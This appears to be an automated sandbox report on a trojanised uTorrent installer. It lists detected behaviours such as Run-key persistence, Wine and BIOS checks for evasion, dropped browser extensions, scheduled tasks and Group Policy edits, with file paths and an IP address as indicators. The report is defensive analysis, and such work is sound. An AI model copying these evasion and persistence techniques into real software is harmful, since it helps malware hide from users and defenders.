Malware Analysis Report

2025-01-18 23:54

Sample ID 241115-eb56kaskep
Target utorrent_installer.exe
SHA256 401409e8da7321fb94a1a8ac6217d2dd067007d29547257575c26a39f31e8931
Tags
upx steam defense_evasion discovery evasion execution persistence phishing spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

401409e8da7321fb94a1a8ac6217d2dd067007d29547257575c26a39f31e8931

Threat Level: Likely malicious

The file utorrent_installer.exe was found to be: Likely malicious.

Malicious Activity Summary

upx steam defense_evasion discovery evasion execution persistence phishing spyware stealer

Contacts a large (537) amount of remote hosts

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Unexpected DNS network traffic destination

Checks BIOS information in registry

Identifies Wine through registry keys

Indirect Command Execution

Adds Run key to start application

Network Share Discovery

Enumerates connected drives

Drops desktop.ini file(s)

Downloads MZ/PE file

Drops Chrome extension

Detected potential entity reuse from brand STEAM.

Drops file in System32 directory

UPX packed file

Checks computer location settings

Executes dropped EXE

Drops file in Program Files directory

Loads dropped DLL

Drops file in Windows directory

Checks installed software on the system

Subvert Trust Controls: Mark-of-the-Web Bypass

Unsigned PE

System Location Discovery: System Language Discovery

Reads user/profile data of web browsers

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Program crash

Browser Information Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Enumerates system info in registry

NTFS ADS

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Modifies system certificate store

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Runs net.exe

Suspicious behavior: GetForegroundWindowSpam

Modifies Control Panel

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-15 03:47

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 04:04

Platform

win11-20241007-en

Max time kernel

1050s

Max time network

1051s

Command Line

"C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Contacts a large (537) amount of remote hosts

discovery

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key opened \REGISTRY\MACHINE\Software\WOW6432Node\Wine C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key opened \REGISTRY\MACHINE\Software\WOW6432Node\Wine C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key opened \REGISTRY\MACHINE\Software\WOW6432Node\Wine C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A

Indirect Command Execution

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 208.67.222.222 N/A N/A
Destination IP 152.89.198.214 N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\ut = "C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe /MINIMIZED" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "\"C:\\Program Files (x86)\\Steam\\steam.exe\" -silent" C:\Users\Admin\Downloads\SteamSetup.exe N/A

Downloads MZ/PE file

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A

Network Share Discovery

discovery

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A

Detected potential entity reuse from brand STEAM.

phishing steam

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DEB6997DB25CE8EC844B742DDA6F019 C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B5CFE5FD779BB3279A8A1976B86E6FEF C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B5CFE5FD779BB3279A8A1976B86E6FEF C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DEB6997DB25CE8EC844B742DDA6F019 C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks installed software on the system

discovery

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Steam\public\steambootstrapper_schinese.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\bin\SteamService.exe C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_german.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_spanish.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File opened for modification C:\Program Files (x86)\Steam\logs\bootstrap_log.txt C:\Program Files (x86)\Steam\steam.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_thai.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Common Files\Steam\steamservice.exe C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
File created C:\Program Files (x86)\Steam\.writable C:\Program Files (x86)\Steam\steam.exe N/A
File created C:\Program Files (x86)\Steam\package\strings_all.zip.vz.c904f95b8996c66336305408448b8bede03956d6_2006928 C:\Program Files (x86)\Steam\steam.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_romanian.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_turkish.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_ukrainian.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_greek.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_tchinese.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\logs\bootstrap_log.txt C:\Program Files (x86)\Steam\steam.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_brazilian.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_english.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\fUiCNqd.xml C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_danish.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_dutch.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\Steam\Steam.exe C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_latam.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_norwegian.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_russian.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\NOWTtjuGDiydC\dgUUnMX.xml C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_korean.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\package\tenfoot_images_all.zip.vz.193cb8c4eb4446698ea2c0a9e8c4e6b6a623dac7_5572671 C:\Program Files (x86)\Steam\steam.exe N/A
File created C:\Program Files (x86)\Steam\package\resources_misc_all.zip.vz.e86a975545f3ab21a77373870cb311ef93934b8c_2224876 C:\Program Files (x86)\Steam\steam.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_hungarian.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_koreana.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\package\resources_hidpi_all.zip.vz.3de815c3117712cb9eeb7ea4c8b275faf481dcfd_56342 C:\Program Files (x86)\Steam\steam.exe N/A
File created C:\Program Files (x86)\OMeOFycTU\znOYOp.dll C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_italian.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\package\strings_en_all.zip.147798246441b35c9a4dbdeecef8d6c4ffda4346 C:\Program Files (x86)\Steam\steam.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_french.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_swedish.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\uninstall.exe C:\Users\Admin\Downloads\SteamSetup.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\RnBNRnIwUzVU2\MzxnQOmYFOtpQ.dll C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\odFjQhT.dll C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\NOWTtjuGDiydC\fYhThFs.dll C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_czech.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File opened for modification C:\Program Files (x86)\Steam\.crash C:\Program Files (x86)\Steam\steam.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_polish.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Steam\steamservice.exe C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\OMeOFycTU\jJabmpg.xml C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\RnBNRnIwUzVU2\TrizmLz.xml C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\kmKpunNFSNUn\iHvZWGY.dll C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_indonesian.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_bulgarian.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_japanese.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_portuguese.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_vietnamese.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A
File created C:\Program Files (x86)\Steam\package\resources_all.zip.vz.3c8b3203e5c69d75ea0684c2409b86fe4d0d6f83_2856188 C:\Program Files (x86)\Steam\steam.exe N/A
File created C:\Program Files (x86)\Steam\public\steambootstrapper_finnish.txt C:\Users\Admin\Downloads\SteamSetup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File created C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\manifest.fingerprint C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File created C:\Windows\Tasks\coQLnzjOCQIuUMNyn.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\VGggbamSlsorNxx.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\kWTyeDFhQZoEtpUUx.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File created C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\_platform_specific\win_x86\widevinecdm.dll.sig C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File created C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\LICENSE C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File created C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\manifest.json C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File created C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\_platform_specific\win_x86\widevinecdm.dll C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File created C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\_metadata\verified_contents.json C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
File created C:\Windows\Tasks\bhzAbyJhiYArNEwhRY.job C:\Windows\SysWOW64\schtasks.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\helper\helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7H7JR.tmp\is-D5VUR.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DF6FB.tmp\BvDOO.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Player Blu Ray 3.1.33\brplayer364.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe N/A
